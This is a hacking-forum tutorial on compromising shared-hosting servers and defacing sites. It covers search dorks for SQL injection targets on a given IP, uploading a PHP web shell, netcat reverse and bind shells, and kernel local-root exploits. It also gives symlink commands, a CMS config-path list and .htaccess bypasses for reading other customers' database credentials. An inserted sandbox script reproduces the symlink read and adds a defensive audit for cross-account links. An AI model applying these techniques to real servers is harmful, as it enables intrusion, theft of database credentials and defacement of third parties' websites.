First, free up some time before reading this tutorial. It is a big one, written so that you can learn and hack everything covered here.
1. Introduction.
Most of the people who deface websites are script kiddies. We are now going to look at how they quickly find vulnerable websites and, from one compromised site, deface other domains hosted on the same server.
2. SQL Injection.
Many people start with SQL injection (SQLi). SQLi is very popular and there are many search dorks out there for it.
2.1 Searching for vulnerable websites.
The search is very easy: put the dork into a search engine and work through the different results. For quicker results you can use an exploit scanner.
2.2 I want to attack a specific website which is on shared hosting.
Again the search is very easy. Let's say the target's IP is 69.162.119.226 (chosen as an example, with no malicious intent, of course). We navigate to:
www.bing.com
In the search field write:
Code:
ip:69.162.119.226 id=
This lists pages hosted on that IP whose URLs contain an id= parameter, the classic place to test for SQL injection. You should get some very interesting results to attack.
3. Attacking the web application itself.
A very good way to gain access is to attack the web application itself. Even if the target site's own web application is up to date and you can't exploit it, you can look for vulnerable web applications elsewhere on the same server, using the same method as in 2.2.
Let's say we again have the IP 69.162.119.226 (with no malicious intent, of course). We navigate to:
www.bing.com
In the search field write:
Code:
ip:69.162.119.226 "wordpress"
This lists sites on that IP powered by WordPress; replace "wordpress" with the name of whatever system you have a working exploit for.
4. I've got admin access, now what?
Once you have admin access to the web application, upload a shell (a PHP script that lets you run commands and manage files on the server from your browser).
5. I've got a shell, now what?
Now it's time to take down your target. You can either:
- root the server, or
- get the victim's database configuration file.
5.1 Rooting the server.
First we need to get around the "security", i.e. the host's PHP restrictions (safe_mode, disable_functions and so on) that stop the shell from running commands. There is a good tutorial on this forum; follow it and you'll be fine.
Second we need a back-connection, or we can bind a port. With a back-connection (reverse shell) the server connects out to you: open the chosen port on your side, start netcat listening on it (nc -l -v -p PORT), then trigger the connection from the web shell. With a bind shell the server listens on a port and you connect to it, which only works if the host's firewall allows inbound connections to that port. The Locus shell provides a good interface for beginners: upload it, go to the back-connection or bind-shell page and follow the instructions.
5.1.1 Pwning the kernel.
One of the most popular ways to root a web server is by pwning the kernel, if it's a Linux box. To find out the kernel version simply type "uname -a" over your back-connect/bind shell. Then look for a local root exploit for that version. Check that the kernel is actually unpatched before running one (distributions backport fixes without changing the version string), and bear in mind that a failed kernel exploit can crash the whole server. If you can't find one, don't give up... try harder...
Code:
http://www.exploit-db.com/local/
5.1.2 Getting the victim's database configuration file.
Many of you have heard of "symlinking". A symbolic link is roughly the Linux/Unix equivalent of a Windows shortcut: a small filesystem entry that points at another path. Symlinks are an ordinary, heavily used feature of every Linux/Unix system, so a host cannot simply turn them off; what it can control is whether the web server follows them (Apache's FollowSymLinks / SymLinksIfOwnerMatch options) and whether the process serving your request is allowed to read the target.
To get the configuration file, first find out what system the victim is using (e.g. WordPress, Joomla, vBulletin). Then go to your shell (you need to have got around the PHP restrictions first) and type "cat /etc/passwd".
/etc/passwd lists every account on the box, including the one created for each hosting customer (usually the cPanel username), together with its home directory. The usernames are shorter than the domain names, for example:
If the victim's site is hackers1.com, its account in /etc/passwd might be hack1, hak1, hac1, hckrs1, hrs1, etc.
So spend some time figuring out the username. Once you have it, it's time to get the database config file. The default configuration file paths, relative to each site's web root, are:
Code:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
phpBB -- /config.php
PHP-Nuke -- /config.php
PHP-Fusion -- /config.php
SMF -- /Settings.php
Joomla -- /configuration.php (or /configuration.php-dist)
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
osCommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
Once you know the path, it's time to extract the database information.
Let's assume your shell is at /home/attacker1/public_html/shell.php, where attacker1 is the username of the account we've just compromised. Doesn't that ring a bell? The victim's hosting space should then be /home/victim1/public_html/, where victim1 is the victim's username. Assuming the victim runs vBulletin, we execute this command from our shell:
Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt
This creates a symbolic link named victim1.txt in our directory that points at the victim's config.php; nothing is copied. When you request attacker1.com/victim1.txt, Apache follows the link and serves the target file, provided it is allowed to follow symlinks here (the FollowSymLinks option) and the process handling the request has read permission on the victim's file. Because the link ends in .txt, the file is not run through PHP, so you get the raw source with the database credentials. Many administrators add some protection to their forums/CMSes, so we're going to get past that next...
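The following is an added example written for this edit, not code from the original post. It reproduces the symlink step above in a throwaway directory tree, shows the read succeeding when the target is readable, and then runs the check a shared-hosting admin would use to spot exactly this: list every symlink under an account's home whose resolved target is outside that home. The account names (attacker1, victim1), the sandbox location and the fake config.php contents are all constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post. Reproduces the cross-account
# symlink read from section 5.1.2 in a throwaway tree, then runs the audit a
# host admin would use to catch it. Every path, account name and file content
# here is constructed for the demo; "s3cr3t" stands in for a DB password.
set -eu

# Build two fake cPanel-style accounts under $1 and drop a stand-in for
# vBulletin's includes/config.php into the victim's webroot.
setup_sandbox() {
    base="$1"
    mkdir -p "$base/home/victim1/public_html/includes" \
             "$base/home/attacker1/public_html/hack"
    printf '<?php\n$config["MasterServer"]["password"] = "s3cr3t";\n' \
        > "$base/home/victim1/public_html/includes/config.php"
}

# The attacker's step: link another account's config into our own webroot.
# No permission check happens when the link is created; -f makes it repeatable.
create_symlink() {
    base="$1"
    ln -sf "$base/home/victim1/public_html/includes/config.php" \
           "$base/home/attacker1/public_html/hack/victim1.txt"
}

# Returns 0 if reading through the link yields the secret. On a real host the
# reader is the web server or the account's PHP process, and the read only
# succeeds if the target's mode and ownership allow it. Here both "accounts"
# are the same uid, so it succeeds, which mimics a world-readable config.php.
link_readable() {
    grep -q 's3cr3t' "$1/home/attacker1/public_html/hack/victim1.txt"
}

# Defender's audit: print every symlink under account home $1 whose resolved
# target lies outside that home, as "link -> target". A host-wide cron job
# would run this over every directory in /home.
find_escaping_symlinks() {
    home="$1"
    find "$home" -type l | while IFS= read -r link; do
        target="$(readlink -f "$link" 2>/dev/null || true)"
        case "$target" in
            "$home"/*) ;;                           # stays inside the account
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Same audit reduced to a count, so a monitoring script can alert on it.
count_escaping_symlinks() {
    find_escaping_symlinks "$1" | wc -l | tr -d ' '
}

# End-to-end run: build the sandbox, do the attacker step, audit both
# accounts, clean up.
run_demo() {
    base="$(cd "$(mktemp -d)" && pwd -P)"
    setup_sandbox "$base"
    create_symlink "$base"
    if link_readable "$base"; then
        echo "config.php readable through the symlink (target not protected)"
    fi
    echo "escaping links under attacker1:"
    find_escaping_symlinks "$base/home/attacker1"
    echo "escaping links under victim1: $(count_escaping_symlinks "$base/home/victim1")"
    rm -rf "$base"
}

run_demo
```

The audit keys on the resolved target, not the link text, so a link to "/" (as used in 5.1.2.2) or a relative "../../victim1/..." path is caught the same way. On a host running Apache with SymLinksIfOwnerMatch, or running each account's PHP as its own user with homes that other users cannot read, the same link exists but the read returns 403 or "permission denied"; the audit still reports it, which is the point.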
5.1.2.1 Htaccess.
The admin of the victim1.com website might have put this .htaccess file in the /includes folder:
Code:
<Files config.php>
order allow,deny
deny from all
</Files>
When we try to read through the symlink we get a 403 Forbidden error. So how do we bypass this? Easy. We create a folder, e.g. "hack", and navigate into it by typing "cd hack". Then we symlink like this:
Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt
and we still get a 403 Forbidden error... Now we put an .htaccess file in the directory above "hack": if we are in "/home/attacker1/public_html/hack", the file goes in "/home/attacker1/public_html/" (inside our own account, not the victim's). The .htaccess has to contain:
Code:
HeaderName victim1.txt
HeaderName is a mod_autoindex directive: the named file is inserted at the top of Apache's automatic directory listing (which needs directory indexes enabled), so when the listing for "hack" is generated Apache reads victim1.txt through the symlink itself. Now we open "/home/attacker1/public_html/hack" in the browser (attacker1.com/hack/) and click "victim1.txt", and it should load the configuration file. If you made the symlink with a different .txt name, replace the name in the .htaccess as well. For example, if I did the symlink:
Code:
ln -s /home/victim1/public_html/includes/config.php 1.txt
then the .htaccess has to be:
HeaderName 1.txt
5.1.2.2 Browse Through Attack - Bypassing ALL Security.
Tired of bypassing everything step by step? Now I'm going to show you a very cool method to bypass ALL of this security.
Take this scenario as an example:
We have got around all the PHP restrictions, but we still can't read through the symlink. What do we do?
First we create a folder with a custom name like "hack". We enter it via our shell and type "ln -s / root", which creates a symlink named "root" pointing at the root of the filesystem. Next we pick a victim domain, e.g. victim1.com, and type "ls -la /etc/valiases/victim1.com": on cPanel hosts that file is owned by the customer's account, so the owner column of the listing gives us the victim's username without guessing. Now we put this .htaccess file in the "hack" folder:
Code:
Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php
"Options Indexes FollowSymLinks" turns on directory listings and lets Apache follow our symlink; "DirectoryIndex test.htm" names an index file that doesn't exist, so Apache shows the listing instead; the AddType/AddHandler lines make Apache serve .php files from this directory as plain text instead of executing them. If we are in "/home/attacker1/public_html/", that corresponds to "attacker1.com", so we go to "attacker1.com/hack" in the browser and see a "folder" which is actually the symlink called "root". Don't get too happy, we still have restricted permissions on some folders. Now, to browse through the victim's whole hosting space, we just navigate to "attacker1.com/hack/root/home/victim1/public_html/".
Fr34k1ng pwn3d. Now you can browse through the website without worrying about IP restrictions in .htaccess files, because Apache reads .htaccess files along the path you requested, which lies inside your own account. (If an .htaccess asks for a username and password you will have to find a way around that yourself.) So you're browsing through, you are in "/includes/" and you find "config.php". You click on it and get a BLANK page. WTF?! Not quite: the file was served as source rather than executed, and the browser hides the <?php ... ?> block as if it were an unknown tag. Right-click, select "view source", and the configuration file is there.
Whether any of this works depends on the host. The FollowSymLinks line only takes effect if the server's AllowOverride permits Options in .htaccess, and hosts that use SymLinksIfOwnerMatch instead (Apache then refuses links whose target is owned by another user), or that run each account's requests as its own user with home directories that other users cannot read, return 403 or "permission denied" as soon as you go through the "root" link.
6. Is this it? Is it really this simple?
Yes, this is it, nothing complicated. This is the way most "hackers" deface, root or whatever else they do to websites/forums.
credit to Ghost-protocol